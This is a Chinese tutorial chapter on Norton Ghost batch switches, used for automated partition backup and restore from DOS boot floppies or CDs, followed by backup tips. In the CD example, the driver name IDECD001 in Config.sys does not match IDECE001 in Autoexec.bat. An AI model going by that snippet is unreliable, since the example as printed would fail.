首先做一个启动盘，包含 Config.sys, Autoexec.bat, Command.com, Io.sys, ghost.exe 文件（可以用 windows 做启动盘的程序完成）。Autoexec.bat 包含以下命令：

ghost.exe -clone,mode=pload,src=d:\bac.gho,dst=1:1 -fx -sure -rb

利用在 D 盘的文件自动还原，结束以后自动退出 ghost 并且重新启动。

自动备份磁盘：

ghost.exe -clone,mode=pdump,src=1:1,dst=d:\bac.gho -fx -sure -rb

自动还原光盘：

包含文件：Config.sys, Autoexec.bat, Mscdex.exe （CDROM 执行程序）, Oakcdrom.sys （ATAPI CDROM 兼容驱动程序）, ghost.exe。

Config.sys 内容为：

DEVICE=OAKCDROM.SYS /D:IDECD001

Autoexec.bat 内容为：

MSCDEX.EXE /D:IDECE001 /L:Z

ghost -clone,mode=load,src=z:\bac.gho,dst=1:1 -sure -rb

可以根据下面的具体说明修改示例：

1.-clone

-clone 在使用时必须加入参数，它同时也是所有的 switch{batch switch} 里最实用的。下面是 clone 所定义的参数：

mode={copy|load|dump|pcopy|pload|pdump},

src={drive|file|driveartition},

dst={drive|file|driveartition}

mode 指定要使用哪种 clone 所提供的命令

copy 硬盘到硬盘的复制 （disk to disk copy）

load 文件还原到硬盘 （file to disk load）

dump 将硬盘做成映像文件 （disk to file dump）

pcopy 分区到分区的复制 （partition to partition copy）

pload 文件还原到分区 （file to partition load）

pdump 分区备份成映像文件（partition to file dump）

src 指定了 ghost 运行时使用的源分区的位置模式及其意义。对应 mode 命令 src 所使用参数例子:

COPY/DUMP 源硬盘号。以 1 代表第一号硬盘

LOAD 映像文件名。g:/back98/setup98.gho 或装置名称 （drive）

PCOPY/PDUMP 源分区号。1:2 代表的是硬盘１的第二个分区

PLOAD 分区映像文件名加上分区号或是驱动器名加上分区号。g:\back98.gho:2 代表映像文件里的第二个分区

dst 指定运行 ghost 时使用的目标位置模式及其意义。对应 mode 命令 dst 所使用参数例子：

COPY/DUMP 目的硬盘号。2 代表第二号硬盘

LOAD 硬盘映像文件名。例 g:\back98\setup98.gho

PCOPY/PLOAD 目的分区号。2:2 代表硬盘 2 的第二个分区

PDUMP 分区映像文件名加分区号。g:\back98\setup98.gho:2

SZEn 指定所使用目的分区的大小：

n=xxxxM 指定第 n 目的分区的大小为 xxxxMB。如 SZE2=800M 表示分区 2 的大小为 800MB

n=mmP 指定第 n 目的分区的大小为整个硬盘的 mm 个百分比。

2.-fxo 当源物件出现坏块时，强迫复制继续进行

3.-fx 当ghost完成新系统的工作后不显示 press ctrl-alt-del to reboot 直接回到DOS下

4.-ia 完全执行扇区到扇区的复制。当由一个映像文件或由另一个硬盘为来源，复制一个分区时，ghost将首先检查来源分区，再决定是要复制文件和目录结构还是要做映像复制（扇区到扇区）。预设是这种形式。但是有的时候，硬盘里特定的位置可能会放一些######的与系统安全有关的文件。只有用扇区到扇区复制的方法才能正确复制

5.-pwd and -pwd=x 给映像文件加密

6.-rb 在还原或复制完成以后，让系统重新启动

7.-sure 可以和 clone 合用。ghost 不会显示 proceed with disk clone-destination drive will be overwritten? 提示信息

九、注意事项

1.在备份系统时，单个的备份文件最好不要超过 2GB。

2.在备份系统前，最好将一些无用的文件删除以减少ghost文件的体积。通常无用的文件有：Windows 的临时文件夹、IE 临时文件夹、Windows 的内存交换文件。这些文件通常要占去100 多兆硬盘空间。

3.在备份系统前，整理目标盘和源盘，以加快备份速度。

4.在备份系统前及恢复系统前，最好检查一下目标盘和源盘，纠正磁盘错误。

5.在恢复系统时，最好先检查一下要恢复的目标盘是否有重要的文件还未转移，千万不要等硬盘信息被覆盖后才后悔莫及啊。

6.在选择压缩率时，建议不要选择最高压缩率，因为最高压缩率非常耗时，而压缩率又没有明显的提高。

7.在新安装了软件和硬件后，最好重新制作映像文件，否则很可能在恢复后出现一些莫名其妙的错误。

(本章完)